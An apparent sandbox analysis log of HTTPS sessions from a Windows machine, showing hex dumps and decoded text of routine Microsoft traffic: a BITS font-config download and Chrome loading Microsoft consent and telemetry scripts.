                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1680&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=985&delivery_rate=1669525&cwnd=222&unsent_bytes=0&cid=70f029965c523d8a&ts=734&x=0"
                                                                                                                                                                                            2024-11-20 20:04:26 UTC214INData Raw: 64 30 0d 0a 6e 30 38 67 66 77 54 73 77 53 75 2b 39 32 43 73 68 62 34 66 72 34 57 49 45 69 42 46 55 49 68 4d 50 62 50 52 70 4b 6e 58 38 45 2f 45 4e 41 49 4b 4a 74 62 6a 51 38 71 44 45 4a 62 5a 6b 55 4f 41 74 4c 41 6e 44 6e 64 68 76 57 49 4d 67 75 4b 4b 6d 4f 47 73 59 50 41 70 52 69 4d 72 69 4b 52 4e 6b 4a 49 59 79 61 65 53 50 63 6e 78 71 69 67 51 61 58 4c 74 62 67 65 43 72 49 6a 53 39 59 56 74 70 57 31 49 43 33 43 63 2b 33 65 52 71 30 2b 64 76 59 73 78 6e 62 53 39 50 42 46 30 59 36 5a 39 43 2b 2f 2b 31 39 32 79 6b 53 4c 44 59 46 49 65 61 6f 69 75 52 70 43 53 47 4d 6d 6e 6b 6a 33 4a 38 61 6f 6f 45 47 6c 79 37 57 34 48 67 71 7a 35 0d 0a
                                                                                                                                                                                            Data Ascii: d0n08gfwTswSu+92Cshb4fr4WIEiBFUIhMPbPRpKnX8E/ENAIKJtbjQ8qDEJbZkUOAtLAnDndhvWIMguKKmOGsYPApRiMriKRNkJIYyaeSPcnxqigQaXLtbgeCrIjS9YVtpW1IC3Cc+3eRq0+dvYsxnbS9PBF0Y6Z9C+/+192ykSLDYFIeaoiuRpCSGMmnkj3J8aooEGly7W4Hgqz5
                                                                                                                                                                                            2024-11-20 20:04:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            9192.168.2.4497592.16.229.162443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:45 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                            2024-11-20 20:04:46 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                            Server: ECAcc (lpl/EF17)
                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                            X-Ms-Region: prod-neu-z1
                                                                                                                                                                                            Cache-Control: public, max-age=247261
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:45 GMT
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            X-CID: 2


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            10192.168.2.4497672.16.229.162443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:47 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                            2024-11-20 20:04:48 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                            X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                            Cache-Control: public, max-age=247258
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:48 GMT
                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                            2024-11-20 20:04:48 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            11192.168.2.44976113.107.246.634432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:48 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                            Host: wcpstatic.microsoft.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://learn.microsoft.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-20 20:04:48 UTC712INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:48 GMT
                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                            Content-Length: 52717
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                            Age: 3554
                                                                                                                                                                                            Cache-Control: max-age=43200
                                                                                                                                                                                            Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                            Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                            Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                            x-ms-request-id: 1f729e99-f01e-00b6-687f-3b5f37000000
                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                            x-azure-ref: 20241120T200448Z-178bfbc474bwh9gmhC1NYCy3rs00000000m0000000004m11
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:04:48 UTC15672INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                            Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                            2024-11-20 20:04:48 UTC16384INData Raw: 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69 65
                                                                                                                                                                                            Data Ascii: {return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cookie
                                                                                                                                                                                            2024-11-20 20:04:48 UTC16384INData Raw: 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61
                                                                                                                                                                                            Data Ascii: r"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + la
                                                                                                                                                                                            2024-11-20 20:04:48 UTC4277INData Raw: 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74 4c
                                                                                                                                                                                            Data Ascii: mentById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<arguments.length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEventL


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            12192.168.2.44976613.107.246.634432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:48 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                            Host: js.monitor.azure.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://learn.microsoft.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-20 20:04:48 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:48 GMT
                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 207935
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                            Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                            ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                            x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                            x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                            x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            x-azure-ref: 20241120T200448Z-178bfbc474bkvpdnhC1NYCuu2w00000000h0000000002ukx
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:04:48 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                            Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                            2024-11-20 20:04:48 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                            Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                            2024-11-20 20:04:48 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                            Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                            2024-11-20 20:04:48 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                            Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                            2024-11-20 20:04:49 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                            Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                            2024-11-20 20:04:49 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                            Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                            2024-11-20 20:04:49 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                            Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                            2024-11-20 20:04:49 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                            Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
